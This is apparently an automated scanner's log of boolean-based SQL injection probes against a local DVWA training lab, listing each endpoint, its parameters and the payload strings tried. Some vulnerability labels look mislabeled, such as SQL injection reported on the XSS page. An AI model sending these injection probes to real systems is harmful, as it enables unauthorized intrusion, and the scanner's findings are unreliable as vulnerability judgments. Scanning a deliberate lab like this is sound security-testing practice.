Target: http://localhost/dvwa/ (GET)

---
URL:http://localhost/dvwa/setup.php (POST)
VulnName: 
Query: {'user_token': '4da734cc730069c29f6d8a049f50743e', 'create_db': 'Create / Reset Database'}
Payload: "+and+"36310"="36310
"+and+"72463"="72463
"+or+35404=35404#
"+and+"13679"="13680
Advice: 
Database: unknown
---
---
URL:http://localhost/dvwa/vulnerabilities/sqli_blind/ (GET)
VulnName: blind sqli
Query: {'user_token': '4522d4b26862e87be7ecfc86614fc538', 'id': 'cntvalue', 'Submit': 'Submit'}
Payload: '+and+'2175'='2175
'+and+'92243'='92243
'+or+47036=47036#
'+and+'17739'='17740
Advice: use orm
Database: unknown
---
---
URL:http://localhost/dvwa/vulnerabilities/sqli/ (GET)
VulnName: blind sqli
Query: {'user_token': '74d5060073a91cd5fffe51153ad20eda', 'id': 'cntvalue', 'Submit': 'Submit'}
Payload: '+and+'2175'='2175
'+and+'92243'='92243
'+or+47036=47036#
'+and+'17739'='17740
Advice: use orm
Database: unknown
---
---
URL:http://localhost/dvwa/vulnerabilities/xss_r/ (GET)
VulnName: blind sqli
Query: {'user_token': '481a869d3ffbc999b9879e0ee3190b6f', 'name': 'cntvalue'}
Payload: "+and+"36310"="36310
"+and+"72463"="72463
"+or+35404=35404#
"+and+"13679"="13680
Advice: use orm
Database: unknown
---
---
URL:http://localhost/dvwa/vulnerabilities/csrf/ (GET)
VulnName: 
Query: {'password_new': 'cntvalue', 'password_current': 'cntvalue', 'password_conf': 'cntvalue', 'Change': 'Change', 'user_token': '808df1e9332d4f35619da71434f67f65'}
Payload: +and+93909=93909
+and+30929=30929
+or+37382=37382#
+and+58355=58356
Advice: 
Database: unknown
---
---
URL:http://localhost/dvwa/vulnerabilities/exec/ (POST)
VulnName: 
Query: {'ip': 'cntvalue', 'Submit': 'Submit', 'user_token': '4e0312001bb7cba75839a6f77169c090'}
Payload: "+and+"36310"="36310
"+and+"72463"="72463
"+or+35404=35404#
"+and+"13679"="13680
Advice: 
Database: unknown
---
---
URL:http://localhost/dvwa/vulnerabilities/brute/ (POST)
VulnName: blind sqli
Query: {'username': 'cntvalue', 'user_token': '9383d851c489f74d339640b7079b4ac0', 'Login': 'Login', 'password': 'cntvalue'}
Payload: '	and	'75521'='75521
'	and	'30852'='30852
'	or	38418=38418#
'	and	'21141'='21142
Advice: use orm
Database: unknown
---